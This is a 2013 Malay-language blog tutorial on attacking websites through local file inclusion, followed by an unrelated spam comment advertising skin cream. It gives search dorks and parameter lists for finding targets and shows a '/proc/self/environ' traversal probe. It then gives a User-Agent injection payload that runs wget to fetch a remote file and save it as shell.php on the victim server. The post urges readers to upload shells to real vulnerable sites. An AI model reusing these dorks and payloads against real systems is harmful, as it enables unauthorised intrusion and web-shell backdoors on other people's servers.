Monday, 1 April 2013

Tut LFI

01:06    1 comment

dork lfi
acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=

 dork sql error

mysql_num_rows()
mysql_fetch_array()
Error Occurred While Processing Request
Server Error in '/' Application
Microsoft OLE DB Provider for ODBC Drivers error
error in your SQL syntax
Invalid Querystring
OLE DB Provider for ODBC
VBScript Runtime
ADODB.Field
BOF or EOF
ADODB.Command
JET Database
mysql_fetch_row()
Syntax error
include()
mysql_fetch_assoc()
mysql_fetch_object()
mysql_numrows()
GetArray()
FetchRow()
Input string was not in a correct format



sila gunakan browser firefox dan pastikan anda sudah install tamper data untuk hack dengan lfi

1 .Oke sebelum kita mula belajar , disini saya kongsikan sedikit dork-dork yang boleh digunakan untuk hunt/cari website-website yang mempunyai vuln LFI ....

allinurl:?page=contact.php
allinurl:?pg=contato.php
allinurl?p=contactform.php
allinurl:?file=gallery.php
allinurl:?id=contact.php
allinurl:?page=gallery.html

sila kembang kan dork diatas dengan otak anda sendiri ;)

2 .oke sekarang macam mana kita nak tahu yang web yang anda cari itu vuln atau tidak ?

oke..korang hanya perlu tambah code ini :

../../../../../../../../proc/self/environ

apabila code diatas sudah ditambah selepas simbol = sekiranya ada error yang keluar seperti dibawah maksudnya website itu vuln >_<

DOCUMENT_ROOT= <-- jika error yg keluar seperti ini dikira sbg vuln atau boleh diupload shell


contoh website yang vuln ialah seperti dibawah (anda boleh gunakan sebagai latihan tetapi jangan deface web tersebut , cukup dengan hanya mengupload shell .. )


3. seterusnya ...buka websie vuln yg telah anda jumpa tadi atau website contoh diatas dan tunggu sehingga habis loading ..
setelah browser telah habis loadin , buka tamper data dan tekan start tamper , kemudian , reload semula website vuln tadi .. lalu anda akan lihat ada kotak yang keluar ... lalu lihat ke arah  (User - Agent ) seperti di dalam gambar di bawah ...



gantikan tulisan yang yang tertulis Mozilla/5.0 bla3 dengan ayat dibawah..

<?system('wget http://familiaglufke.com/nec.txt -O shell.php');?>


dan tekan oke..

sekarang korang dah berjaya... ^_^

sekarang korang mahu lihat shell korang ?

1 comment:

  1. Unknown13 July 2019 at 05:01

    This really grabs my attention.It is everything you always wanted to know in respect to skin cream.nutra platform This can be right, but the same Anti Aging isn't always the same solution. This gets better though.Anti Aging purists will disagree with me. When push comes to shove I should try to deflect that whenever I can. I may not always be right on target, but you might have to skip that. The mavens here already know this. As a matter of course, "Where there's smoke there's fire.
    https://www.nutraplatform.com/

    ReplyDelete

Subscribe to: Post Comments (Atom)